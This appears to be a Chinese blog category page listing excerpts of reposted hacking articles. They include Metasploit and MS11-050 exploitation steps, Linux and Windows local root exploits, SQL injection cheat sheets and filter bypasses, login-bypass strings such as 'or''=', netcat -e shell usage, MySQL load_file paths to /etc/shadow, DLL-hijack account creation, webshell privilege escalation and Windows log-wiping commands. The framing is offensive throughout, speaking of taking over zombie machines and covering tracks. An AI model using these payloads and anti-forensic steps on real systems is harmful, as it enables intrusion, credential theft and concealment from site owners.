![](https://img-blog.csdnimg.cn/20201014180756757.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
hacking
「已注销」
这个作者很懒,什么都没留下…
展开
-
Metasploit使用教程
这个工具包分Linux/Unix版的和Windows版,考虑到大多数人都是使用的Windows系统,这里我把Windows版的 Metasploit使用方法说明一下,至于Linux/Unix下的使用方法和Windows下的也是大同小异,这里就不额外的说明了。 下载回Metasploit的安装程序之后双击安装,傻瓜化的安装过程,这里就不多说了。安装完成后可以看到安装目录下多了很多文件,主要转载 2011-10-24 17:27:24 · 958 阅读 · 0 评论 -
漏洞扫描软件Nessus 4.2.0版使用教程
Nessus是一个功能强大而又易于使用的远程安全扫描器,它不仅免费而且更新极快。安全扫描器的功能是对指定网络进行安全检查,找出该网络是否存在有导致对手攻击的安全漏洞。该系统被设计为client/sever模式,服务器端负责进行安全检查,客户端用来配置管理服务器端。在服务端还采用了plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。在Nessus中还采用了一转载 2011-10-24 18:51:12 · 2177 阅读 · 2 评论 -
强大溢出工具包 Metasploit使用教程
Metasploit 是个好东西,实在想不到别的办法了,或许这东西能帮你一下,Metasploit包含了众多exploit,说不准还能用上几个,搞几台好肉鸡. 下载Metasploit双击进行安装,非常简单,一路回车就行了。安装完之后看下安装目录下的Msfconsole.bat和msfweb.bat,第一个是命令下的控制台。第二个是图形界面下的程序。现在我们先来看下命令行下的使用方法,运行后我转载 2011-10-24 20:01:43 · 1173 阅读 · 0 评论 -
medusa命令介绍
随手写一下,medusa破解起来还是比较快的,首先我们看看帮助root@perl-exploit:/pentest/exploits/framework3# medusaMedusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus NetworksALERT: Host information must be supplied.转载 2011-10-24 14:52:36 · 2431 阅读 · 0 评论 -
Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit
估计现在已经没多大用了。2006年的漏洞,不过还是在某视频网站上看到了这个,用起来很爽,也很简单。#!/usr/bin/env python################################################################################ ro转载 2011-10-26 10:56:10 · 664 阅读 · 0 评论 -
这是最新的0day Linux 2.4.x / 2.6.x umount exploit (已公开)
这算个最新的目标较多。今年1月的。0day linux exploit jan 9th 2011tested on latest centos5/5.5 and debian lenny http://stablehost.us/exploits/umountshould work on some other distributionsexploits CIFS mount转载 2011-10-26 11:04:01 · 1333 阅读 · 0 评论 -
黑客基础内容
黑客基础内容:21种RING的提权方法2006-07-20 10:11作者:liulj出处:天极安全责任编辑:卢林嘉小编推荐更多关于黑客基础内容的文章:黑客基础内容:DOS常用命令黑客基础内容:TCP端口作用,漏洞,操作黑客基础内容:IPC$空连接的入侵和防御黑客基础内容:21种RING的提权方法黑转载 2011-10-26 23:28:56 · 925 阅读 · 0 评论 -
NC工具的使用说明(1)
NC工具的使用说明...nc使用说明参数介绍: nc.exe -h即可看到各参数的使用方法。 基本格式:nc [-options] hostname port[s] [ports] ... nc -l -p port [options] [hostname] [port]-d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gat转载 2011-10-27 11:22:23 · 1801 阅读 · 1 评论 -
IIS解析漏洞
什么是“IIS解析漏洞”? 在 Windows 2003 IIS 6.0 下有两个漏洞,微软一直没有给出补丁。 漏洞1: 在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来转载 2011-10-27 12:45:04 · 1507 阅读 · 0 评论 -
maicaidao
这篇文章是一个朋友写的,但是他不让说他是谁,就替他保密一下了。这篇文章看起来很像软文,但是文章中介绍的还挺详细,不要把他当成软文来读就行了。作者:XXX我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的技术和经验也不断提高,在渗透过程中收集了大大小小的工具一堆,都快把自己的U盘放满了,当然,随着时代和技术的进步,很多工具也相应的过时了,但是却很少去删掉转载 2011-10-27 13:12:22 · 1605 阅读 · 0 评论 -
SQL 手工注入大全
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多,看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 ms转载 2011-10-27 13:16:13 · 2022 阅读 · 0 评论 -
汇编语言1—6章笔记
前言: 由于近期太忙!所以想到做这个,一面强迫自己学习,一面希望能给大家一点帮助!我以后会把汇编语言的各章重点以及详细的课后解答写出来,供大家学习参考!由于本人水平有限,制作仓促,不能保证解析完全正确。望批评指正!转载 2011-11-16 16:09:29 · 2099 阅读 · 0 评论 -
Windows Server 2003/2008 本地提权 0day
http://hi.baidu.com/google_sunzn/blog/item/a36749519e58bf3d43a75b90.htmlsunzn:出来好久了,今天提权用到,记录下! 首先查看本地用户,是没有 sunzn 这个用户的。使用 Windows Server 2003/2008 本地提权 0day 进转载 2011-10-27 19:09:46 · 3461 阅读 · 0 评论 -
滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型
今天日一站发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:www.92hack.net/ashx.txt然后访问上传后的ashx转载 2011-10-27 23:00:05 · 1040 阅读 · 0 评论 -
win下的IPC连接。
IPC入侵攻略!其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档,也包含了一些自己的心得体会。本文欢迎非商业性转载,但请保持文章转载 2011-10-28 11:23:41 · 678 阅读 · 0 评论 -
webshell提权教程小结
前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文章总成了这一套webshell提权教程,希望大家能够学习到东西,也希望大家能够积极补充,共同进步!********************************************************************************转载 2011-10-27 17:51:46 · 1100 阅读 · 0 评论 -
最新被动式DLL提权工具Ws2Help.dll
上传到sougou目录,注意不要改名字。等待该目录有文件联网的时候就自动添加系统账号了。使用方法:把此文件放到QQ 迅雷 BT 等工具的同目录下。运行后会导致系统执行创建用户需要创建的用户名和密码可以十六进制修改。Ps:一个程序的启动它会调用很多dll或者ocx组件,但是他是有一个顺序的。比如这个迅雷,他启动时会调用Ws2Help.dll这个组件,一转载 2011-10-27 19:07:08 · 1065 阅读 · 0 评论 -
什么是旁注?
旁注的词典解释是1.正文旁边的小注、2.在书页边上的手写或印刷的注释、3.从旁边流入、4.普降。旁注的计算机术语就是通过目标网站所在的主机上存放的其他网站进行注入攻击的方法。纠错 编辑摘要旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。以转载 2011-10-27 20:29:41 · 2380 阅读 · 0 评论 -
入侵指定网站
首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 如果是静态的(.htm或html),一般是不会成功的。 如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。Quote: 以下是入侵网站常用方法: 1.上传漏洞 如转载 2011-10-27 20:30:43 · 3819 阅读 · 1 评论 -
ret2reg缓冲区溢出攻击
被溢出程序源码如下: root@linux:~/pentest# cat vulnerable.c #include #include void evilfunction(char *input) { char buffer[1000]; strcpy(buffer, input); }转载 2011-10-28 15:22:28 · 783 阅读 · 0 评论 -
内网渗透一些命令收集整理
内网渗透一些命令收集整理作者:cnbird2008=====一些收集信息的命令=====@查询本机的一些情况ipconfig /all@查询存在关系的机器Net view@查询有几个域nei view /damin转载 2011-10-28 15:34:20 · 739 阅读 · 0 评论 -
MS11-050 Metasploit 利用
首先打开Metasploit选择msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement然后配置选项 本机IP是 192.168.92.133进行攻击 exploit 在被攻击电脑上执行http://192.168.92.133:8888/lenhook.html返回Met转载 2011-11-17 19:44:12 · 1875 阅读 · 0 评论 -
hacktips-10 条 nmap 的技巧
这里是 10 条 nmap 的技巧,运行于 CLI 环境下,如果你更喜欢用 GUI 工具的话,请用 Zenmap 。1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O 这里的 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV转载 2011-11-17 20:38:18 · 606 阅读 · 0 评论 -
LINUX下MYSQL的load_file常用路径
/etc/passwd 0x2F6574632F706173737764 /etc/shadow 0x2F6574632F736861646F77 /etc/issue 0x2F6574632F6973737565 /etc/fstab 0x2F6574632F6673746162 /etc/host.conf 0x2F6574632F686F73742E636F6E66 /etc/motd转载 2011-11-20 22:49:37 · 1207 阅读 · 0 评论 -
google hacking....
link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到所有连接到Google的页面.不用担心==================================================intext:管理filetype:mdbinurl:filesite:xx.com filetype:txt 查找TXT转载 2011-11-21 12:40:48 · 3954 阅读 · 0 评论 -
Metasploit使用简介3
conect 命令connect命令可以连接到远程主机,连接方式和nc、telnet相同,可以指定端口,如下为connect命令演示:msf > connect 127.0.0.1 4000[*] Connected to 127.0.0.1:4000Microsoft Windows [Version 6.1.7600]Copyright转载 2011-11-21 17:20:42 · 1596 阅读 · 0 评论 -
各位大牛经典入侵经验摘录.
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!文章:各位大牛经典入侵经验摘录.2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据转载 2011-11-22 01:15:57 · 1923 阅读 · 0 评论 -
从后台得到webshell技巧大汇总
前 言 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshe转载 2011-11-22 01:23:05 · 2046 阅读 · 0 评论 -
windows日志删除工具
这个利器当然就是传说中的psloglist.exe工具了,在cmd下输入psloglist.exe \acceptelua可以防止弹出什么什么协议之类的psloglist.exe -c security 删除登录日志psloglist.exe -g security backup.evt 导出登录日志psloglist.exe -c -g security backup.evt 导转载 2011-11-22 11:27:19 · 2202 阅读 · 0 评论 -
windwos PS tools 管理员工具集 可以用来删日志哦
以下是我的工具列表: psfile.exe psgetsid.exe Psinfo.exe pskill.exe pslist.exe psloglist.exe pspasswd.exe psservice.exe psshutdown.exe whois.exe (注:1.上述工具转载 2011-11-22 11:34:42 · 1670 阅读 · 0 评论 -
php+mysql快速渗透
1)如何快速寻找站点注入漏洞?2)PHP+MYSQL数据库下快速寻找WEB站点路径? 3)MYSQL LOAD FILE()下读取文件?3)MYSQL INTO OUTFILE下写入PHPSHELL?简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。转载 2011-11-21 18:20:06 · 1462 阅读 · 0 评论 -
绕过SQL注入限制的方法
经过我的收集,大部分的防注入程序都过滤了以下关键字:and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。对于关键字的过滤,以下是我收集的转载 2011-11-01 05:24:54 · 747 阅读 · 0 评论 -
网站万能密码
好久都没写东西了,今天写个万能密码,说是万能,是因为如果网站没做防注入,用这个密码当帐户密码即可登录管理后台,进去后想干什么那就干什么了。附一些网上查到的万能密码'or''='"or=or"'or''=''or''=''or'='or''or'='1''or' '1'='1'or 'a'='a'经本人验证,'or''=''or''='的效果是最好的!转载 2011-11-01 00:50:53 · 1550 阅读 · 0 评论 -
对Windows下日志清除的一些总结
这几日研究的课题是系统日志的清理,主要参考的书籍是《暗战强人. 黑客攻防实战高级演练》,虽然讲到的技术比较老,但对于刚入门的我还是收获较大。在Windows系统中,日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等,其扩展名为.log、.txt。我们先来熟悉下各个日志文件存放的位置及相应的服务。系统转载 2011-11-22 11:54:41 · 3944 阅读 · 0 评论 -
linux 命令
拿到一个linux下的shell之后,有用的命令整理:cat ./../mainfile.php - Config file.ls -la - Lists directory's.ifconfig {eth0 etc} - Ipconfig equiv.ps aux - Show running proccess's.gcc in_file -o out_f转载 2011-11-22 18:02:22 · 607 阅读 · 0 评论 -
Metasploit使用简介(1)
show命令在msfconsole中键入show,系统会显示Metasploit的所有模块,若想显示某一类型的模块可以加入模块名称,最常用的主要有一下三个:show payloads、show exploits、show auxiliary。msf>show auxiliary Auxiliary=========转载 2011-11-21 17:16:52 · 2139 阅读 · 2 评论 -
Metasploit 使用简介2
Metasploit Framework 是非常优秀的开源渗透测试框架,像我这样的菜鸟刚刚听说,于是花时间好好研究了一下,整理了一下学习笔记,贴出来和大家一起交流。第一次写文章又不足的地方大家多多指点。Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的转载 2011-11-21 17:17:59 · 1305 阅读 · 0 评论 -
在线hash密码破解网站列表
这是一份在线hash密码破解网站列表,支持多种类型的hash密码,目前可破解查询的hash包括:MD5、NTLM、LM、SHA1、SHA 256-512、MySQL、WPA-PSK 。MD5MD5Decrypter(uk)Plain-TextCrackfoo -NNCHashcrackGdataMD5thisMD5crackNoisetteJooml转载 2011-11-23 23:49:46 · 7825 阅读 · 0 评论 -
NC提交数据的方法
今天才知道用NC还可以向web服务器提交修改后的数据包。1、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gatew转载 2011-11-25 15:40:27 · 2174 阅读 · 0 评论 -
Nessus 使用说明
Nessus 使用说明 1. 硬件需求一台 linux 机器作为服务器端,一台 Windows 机器作为客户端。如果 linux 使用比较熟,也可以不使用 windows 作为客户端,直接使用 linux 下的客户端。(此文档暂不对这部分进行说明)2. NESSUS 的安装UNIX 系统服务器端需要编译然后才可以使用,推荐使用 linux 作为服务器。如技术条件允许转载 2011-11-27 20:41:11 · 4026 阅读 · 1 评论